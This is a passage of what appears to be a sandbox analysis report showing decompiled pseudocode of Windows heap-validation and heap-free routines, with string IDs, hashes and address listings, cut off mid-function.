                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: a9f3f49cfefe8c315a435706f6346e6ac1394c3267b557ae2f2485cdaa4532e4
                                          • Instruction ID: 18aca14c788b968fe8a9d71574ef8e13c2dee221a9fe6838a938ba64625ba386
                                          • Opcode Fuzzy Hash: a9f3f49cfefe8c315a435706f6346e6ac1394c3267b557ae2f2485cdaa4532e4
                                          • Instruction Fuzzy Hash: 1E12E030604642DFD72DDF69C494BBABBF9FF58300F158459E8868BA41D736E8A0CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01164496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E01164496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E011649A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1196378 = _t267;
						asm("int3");
						 *0x1196378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E010D174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E010AB150();
							} else {
								E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E010AB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E010AB150();
							} else {
								E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E010AB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1196350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E010E9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E010D174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E010AB150();
										} else {
											E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E010AB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E010AB150();
									} else {
										E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E010AB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E010AB150();
								} else {
									E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E010AB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E010AB150();
							} else {
								E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01164AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0115FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E011523E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                          0x011644a1
                                          0x011644a3
                                          0x011644a7
                                          0x011644ac
                                          0x011644af
                                          0x011644b2
                                          0x011644b9
                                          0x011644bc
                                          0x011647f2
                                          0x011647f2
                                          0x011647f8
                                          0x011647fc
                                          0x011647fe
                                          0x01164804
                                          0x01164805
                                          0x01164805
                                          0x0116480c
                                          0x01164810
                                          0x01164812
                                          0x01164812
                                          0x01164812
                                          0x01164822
                                          0x01164822
                                          0x01164827
                                          0x01164827
                                          0x00000000
                                          0x01164827
                                          0x011644c4
                                          0x011644d3
                                          0x011644d9
                                          0x011644dc
                                          0x011644de
                                          0x011644e0
                                          0x01164560
                                          0x01164520
                                          0x01164522
                                          0x01164525
                                          0x01164528
                                          0x0116452b
                                          0x0116452e
                                          0x01164530
                                          0x01164697
                                          0x0116469d
                                          0x011646a1
                                          0x011646c0
                                          0x011646c5
                                          0x011646a3
                                          0x011646b8
                                          0x011646bd
                                          0x011646cb
                                          0x011646d4
                                          0x01164677
                                          0x01164677
                                          0x01164679
                                          0x0116467c
                                          0x0116468a
                                          0x01164690
                                          0x01164690
                                          0x011647f1
                                          0x011647f1
                                          0x011647f1
                                          0x00000000
                                          0x011647f1
                                          0x01164536
                                          0x01164539
                                          0x0116453c
                                          0x01164636
                                          0x0116463c
                                          0x01164640
                                          0x0116465f
                                          0x01164664
                                          0x01164642
                                          0x01164657
                                          0x0116465c
                                          0x01164670
                                          0x00000000
                                          0x01164542
                                          0x01164542
                                          0x01164546
                                          0x01164548
                                          0x0116454b
                                          0x01164555
                                          0x0116455b
                                          0x0116455b
                                          0x0116455b
                                          0x0116455d
                                          0x0116455d
                                          0x0116455d
                                          0x00000000
                                          0x0116455d
                                          0x0116453c
                                          0x01164579
                                          0x0116457c
                                          0x01164587
                                          0x01164589
                                          0x01164591
                                          0x01164592
                                          0x01164597
                                          0x01164598
                                          0x011645a1
                                          0x011645ab
                                          0x011645ab
                                          0x011645a1
                                          0x011645ae
                                          0x011645b4
                                          0x011645b9
                                          0x011645bd
                                          0x01164759
                                          0x01164759
                                          0x0116475f
                                          0x01164761
                                          0x01164763
                                          0x01164765
                                          0x01164768
                                          0x0116476b
                                          0x0116476d
                                          0x0116479c
                                          0x0116479c
                                          0x0116479f
                                          0x011647a2
                                          0x011647a4
                                          0x01164830
                                          0x01164833
                                          0x01164879
                                          0x0116487d
                                          0x011648f1
                                          0x011648f3
                                          0x011648f3
                                          0x00000000
                                          0x011648f3
                                          0x0116487f
                                          0x01164885
                                          0x01164887
                                          0x011648a8
                                          0x011648a8
                                          0x011648ae
                                          0x011648b0
                                          0x011648dc
                                          0x011648dc
                                          0x011648dc
                                          0x011648dc
                                          0x011648ec
                                          0x00000000
                                          0x011648ec
                                          0x011648b2
                                          0x011648bc
                                          0x011648be
                                          0x011648c1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011648c3
                                          0x011648c3
                                          0x011648c6
                                          0x011648c9
                                          0x011648cc
                                          0x011648d1
                                          0x011648d4
                                          0x00000000
                                          0x00000000
                                          0x011648d6
                                          0x011648d7
                                          0x011648da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011648da
                                          0x0116494f
                                          0x01164955
                                          0x01164959
                                          0x01164978
                                          0x0116497d
                                          0x0116495b
                                          0x01164970
                                          0x01164975
                                          0x01164986
                                          0x01164987
                                          0x0116498a
                                          0x0116498d
                                          0x01164997
                                          0x011647ef
                                          0x011647ef
                                          0x011647ef
                                          0x00000000
                                          0x011647ef
                                          0x01164890
                                          0x01164890
                                          0x01164891
                                          0x01164891
                                          0x01164894
                                          0x01164897
                                          0x0116489d
                                          0x011648a0
                                          0x00000000
                                          0x00000000
                                          0x011648a2
                                          0x011648a3
                                          0x011648a6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011648a6
                                          0x011648fb
                                          0x01164901
                                          0x01164905
                                          0x01164924
                                          0x01164929
                                          0x01164907
                                          0x0116491c
                                          0x01164921
                                          0x0116492f
                                          0x01164935
                                          0x01164936
                                          0x01164939
                                          0x01164942
                                          0x00000000
                                          0x01164947
                                          0x01164835
                                          0x0116483b
                                          0x0116483f
                                          0x0116485e
                                          0x01164863
                                          0x01164841
                                          0x01164856
                                          0x0116485b
                                          0x01164869
                                          0x0116486c
                                          0x0116486f
                                          0x011647e7
                                          0x011647e7
                                          0x00000000
                                          0x011647ec
                                          0x011647aa
                                          0x011647b0
                                          0x011647b4
                                          0x011647d3
                                          0x011647d8
                                          0x011647b6
                                          0x011647cb
                                          0x011647d0
                                          0x011647de
                                          0x011647df
                                          0x011647e2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0116476f
                                          0x0116476f
                                          0x01164778
                                          0x01164785
                                          0x01164787
                                          0x0116478c
                                          0x0116478e
                                          0x00000000
                                          0x00000000
                                          0x01164790
                                          0x01164792
                                          0x01164794
                                          0x00000000
                                          0x00000000
                                          0x01164796
                                          0x01164799
                                          0x00000000
                                          0x01164799
                                          0x00000000
                                          0x011645c3
                                          0x011645c3
                                          0x011645c7
                                          0x011645c7
                                          0x011645ca
                                          0x011645cf
                                          0x011645d3
                                          0x011645df
                                          0x011645e4
                                          0x011645e6
                                          0x011645e8
                                          0x011645ed
                                          0x011645ed
                                          0x011645f2
                                          0x011645f2
                                          0x011645f7
                                          0x011645fc
                                          0x01164602
                                          0x01164606
                                          0x01164609
                                          0x0116460f
                                          0x011646de
                                          0x011646e3
                                          0x011646e5
                                          0x011646ec
                                          0x011646ee
                                          0x011646f6
                                          0x011646f6
                                          0x011646f6
                                          0x011646f6
                                          0x011646ec
                                          0x01164615
                                          0x01164615
                                          0x0116461d
                                          0x0116462e
                                          0x0116462e
                                          0x0116461d
                                          0x0116460f
                                          0x01164609
                                          0x011646fd
                                          0x00000000
                                          0x00000000
                                          0x01164710
                                          0x0116471a
                                          0x01164720
                                          0x01164720
                                          0x01164722
                                          0x0116472c
                                          0x00000000
                                          0x0116472e
                                          0x0116472e
                                          0x00000000
                                          0x0116472e
                                          0x0116472c
                                          0x01164738
                                          0x0116473c
                                          0x0116474b
                                          0x01164751
                                          0x01164751
                                          0x00000000
                                          0x0116473c
                                          0x011648f4
                                          0x011648f4
                                          0x00000000
                                          0x011648f4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: d5470c7427dc1cba3cb3a9164347d1ca5ccea13d9be6341b0cd6c25a4f977ebf
                                          • Instruction ID: 937b66742acf59262e467d8417850e86a37588f0bc9662c641b045ecb35d8e89
                                          • Opcode Fuzzy Hash: d5470c7427dc1cba3cb3a9164347d1ca5ccea13d9be6341b0cd6c25a4f977ebf
                                          • Instruction Fuzzy Hash: 03F16431600646DFDB29CFA9C480BBAFBF9FF49304F448119E1869BA41C736A9A5CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CA309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E010CA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x1198a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E010CA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E010CDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E010A9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E010AA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x1198748 - 1;
						if( *0x1198748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E010AB150();
								} else {
									E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E010AB150();
								__eflags =  *0x1197bc8;
								if( *0x1197bc8 == 0) {
									__eflags = 1;
									E01162073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x1198748 - 1;
							if( *0x1198748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E010D174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E010C7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E011614FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E010A9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E010A9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x1198748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E010AB150();
											} else {
												E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E010AB150();
											_pop(_t491);
											__eflags =  *0x1197bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01162073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0116A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E010CA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E010C7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E010C7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
